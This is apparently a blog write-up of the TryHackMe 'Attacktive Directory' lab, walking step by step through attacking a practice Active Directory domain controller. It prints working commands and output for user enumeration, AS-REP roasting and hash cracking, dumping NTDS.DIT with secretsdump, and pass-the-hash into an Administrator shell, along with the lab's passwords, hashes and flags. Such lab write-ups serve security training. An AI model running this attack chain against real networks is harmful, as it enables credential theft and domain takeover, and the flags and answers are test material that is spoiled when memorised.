Microsoft Active Directory can be found at every medium/large organization (99% according to the THM room). This is why it is a common target for black hats and other malicious actors. In the Attacktive Directory room we can learn a lot about targeting the services in an AD.
I use the THM in-browser Kali Linux for this task!
Task 1: Deploy The Machine
Connect to the THM network with OpenVPN or use the Attack Box / Kali Linux.
Task 2: Setup
If we don’t use the Attack Box / THM Kali Linux then we have to follow the installation steps. Install the Impacket, Bloodhound and Neo4j.
Task 3: Welcome to Attacktive Directory
We will use the nmap and enum4linux tools to answer the questions.
Let’s run nmap and check the services on the Domain Controller!
┌──(root㉿kali)-[~]
└─# nmap -A -T5 <WIN_DC_IP>
The results help us to answer the questions.
| rdp-ntlm-info:
| Target_Name: THM-AD
| NetBIOS_Domain_Name: THM-AD
| NetBIOS_Computer_Name: ATTACKTIVEDIREC
| DNS_Domain_Name: spookysec.local
| DNS_Computer_Name: AttacktiveDirectory.spookysec.local
| Product_Version: 10.0.17763
What tool will allow us to enumerate port 139/445?
enum4linux
What is the NetBIOS-Domain Name of the machine?
THM-AD
What invalid TLD do people commonly use for their Active Directory Domain?
.local
Task 4: Enumerating Users via Kerberos
Before we start the enumeration we have to use wget to download the kerbrute utility and the userlist.txt and passwordlist.txt files from the task. At the time of writing this article the followings were valid:
wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt
wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt
When we are ready we can run the enumeration. Let’s use the ./kerbrute -h command to check the help of the tool. We can answer a question with looking at the output:
What command within Kerbrute will allow us to enumerate valid usernames?
userenum
Now we can parameterize and run the command to enumerate the users.
┌──(root㉿kali)-[~]
└─# ./kerbrute userenum -d spookysec.local --dc <WIN_DC_IP> userlist.txt
Looking at the user list we see some interesting system user result: svc-admin@spookysec.local, backup@spookysec.local
The next questions can be answered with this information, though it did not jump out at us that hard.
What notable account is discovered? (These should jump out at you)
svc-admin
What is the other notable account is discovered? (These should jump out at you)
backup
Task 5: Abusing Kerberos
We will use the Impacket tool for this task. I had to look it up on the Kali Box.
┌──(root㉿kali)-[~]
└─# find / -name GetNPUsers.py
/usr/share/doc/python3-impacket/examples/GetNPUsers.py
Let’s check the help text of the tool with providing the -h option to the command.
/usr/share/doc/python3-impacket/examples/GetNPUsers.py -h
Now we can run the following command:
┌──(root㉿kali)-[~]
└─# /usr/share/doc/python3-impacket/examples/GetNPUsers.py -no-pass -dc-ip 10.10.80.53 spookysec.local/svc-admin
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Getting TGT for svc-admin
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:e51902b5f819fe04fd84a4247947031d$ac6f48066520a321ef9a0cb75739a9858e3e52c7faf4ec74ebb8469adc50c0fd0de6586fafb83bd24a36578d62358ec19f8ab03db497ee237abfac902ebe15991d4133c855cad4797c799a08178653f686760cc9a0666366c19a4921a6fa464c04425cb91607c9153fe399abefa16c4d42b7fa569d1ee4f9b6923909f52c2e9da1de090db3cf01b426274f776d9126d14d48fb49b1cb74cb4fb21766ba871bfa26dc90e7660d3599bc697bf6750e8f1ecc1635aef31d1c02cde4ee2c3c1473ff549bf5424da1b5ea79099f46e08a629b1fab9e0ea6bcfd7918b0f458f0530b6f8353fe80457df37f6aff860037d565e6c482
Let’s answer the first question.
We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?
svc-admin
For the next question copy the first part of the Kerberos hash and we will check it in the hashcat examples.
$krb5asrep$23$
Open a browser and search for the hashcat examples, then look for that string we have copied before.
Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)
Kerberos 5, etype 23, AS-REP
Let’s save the hash to a text file and run hashcat on it.
┌──(root㉿kali)-[~]
└─# hashcat hash.txt passwordlist.txt
From the command output we will be able to answer a question.
What mode is the hash?
18200
Now we can see the cracked password with using the –show option of hascat.
┌──(root㉿kali)-[~]
└─# hashcat --show hash.txt
Now crack the hash with the modified password list provided, what is the user accounts password?
management2005
Task 6: Back to the Basics
Now we have a valid credential to a domain user, so we can enumerate the shares. Remember: svc-admin has the password management2005!
A basic tool we can use for share enumeration is the smbclient. Let’s have a look!
┌──(root㉿kali)-[~]
└─# smbclient --list 10.10.80.53 --user spookysec.local/svc-admin%management2005
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backup Disk
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.80.53 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
What utility can we use to map remote SMB shares?
smbclient
Which option will list shares?
-L
How many remote shares is the server listing?
6
There is one particular share that we have access to that contains a text file. Which share is it?
backup
┌──(root㉿kali)-[~]
└─# smbclient \\\\spookysec.local\\backup --user svc-admin%management2005
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Apr 4 19:08:39 2020
.. D 0 Sat Apr 4 19:08:39 2020
backup_credentials.txt A 48 Sat Apr 4 19:08:53 2020
8247551 blocks of size 4096. 3802964 blocks available
smb: \> get backup_credentials.txt
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (0.7 KiloBytes/sec) (average 0.7 KiloBytes/sec)
What is the content of the file?
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw
┌──(root㉿kali)-[~]
└─# base64 -d backup_credentials.txt
backup@spookysec.local:backup2517860
Decoding the contents of the file, what is the full contents?
backup@spookysec.local:backup2517860
Taks 7: Elevating Privileges within the Domain
Now we know two credentials of two different users, so we can have a great chance for privilege escalation.
| svc-admin | management2005 |
| backup | backup2517860 |
The task instructs us to use another tool called secretsdump.py, so let’s look for it on our Linux.
┌──(root㉿kali)-[~]
└─# find / -name secretsdump.py 2>/dev/null
/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py
/usr/share/doc/python3-impacket/examples/secretsdump.py
/usr/share/responder/tools/MultiRelay/impacket-dev/impacket/examples/secretsdump.py
/usr/share/responder/tools/MultiRelay/impacket-dev/secretsdump.py
/usr/share/metasploit-framework/modules/auxiliary/scanner/smb/impacket/secretsdump.py
After reading the help text of the tool we can run the command with the proper options. I just added the spookysec.local domain to my /etc/hosts file here.
┌──(root㉿kali)-[~]
└─# /usr/share/doc/python3-impacket/examples/secretsdump.py spookysec.local/backup:backup2517860@spookysec.local
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
(...)
Now we can answer the following questions:
What method allowed us to dump NTDS.DIT?
DRSUAPI
What is the Administrators NTLM hash?
0e0363213e37b94221497260b0bcb4fc
At this point we can run a “pass the hash” attack. It is the answer for the next question.
What method of attack could allow us to authenticate as the user without the password?
pass the hash
Using a tool called Evil-WinRM what option will allow us to use a hash? -H
Task 8: Flag Submission Panel
Let’s hit that system hard now and use evil-winrm for a remote console!
┌──(root㉿kali)-[~]
└─# evil-winrm -H 0e0363213e37b94221497260b0bcb4fc -i spookysec.local -u Administrator
With the evil-winrm command we got an Administrator shell on the target system. From this point we have to visit the users and find their flags.
svc-admin
TryHackMe{K3rb3r0s_Pr3_4uth}
backup
TryHackMe{B4ckM3UpSc0tty!}
Administrator
TryHackMe{4ctiveD1rectoryM4st3r}
We’re done with this room! Congratulations!
If you have anything to share then please visit my Tom’s IT Cafe Discord Server!
Discover more from Tom's IT Cafe
Subscribe to get the latest posts sent to your email.
Tom's IT Cafe 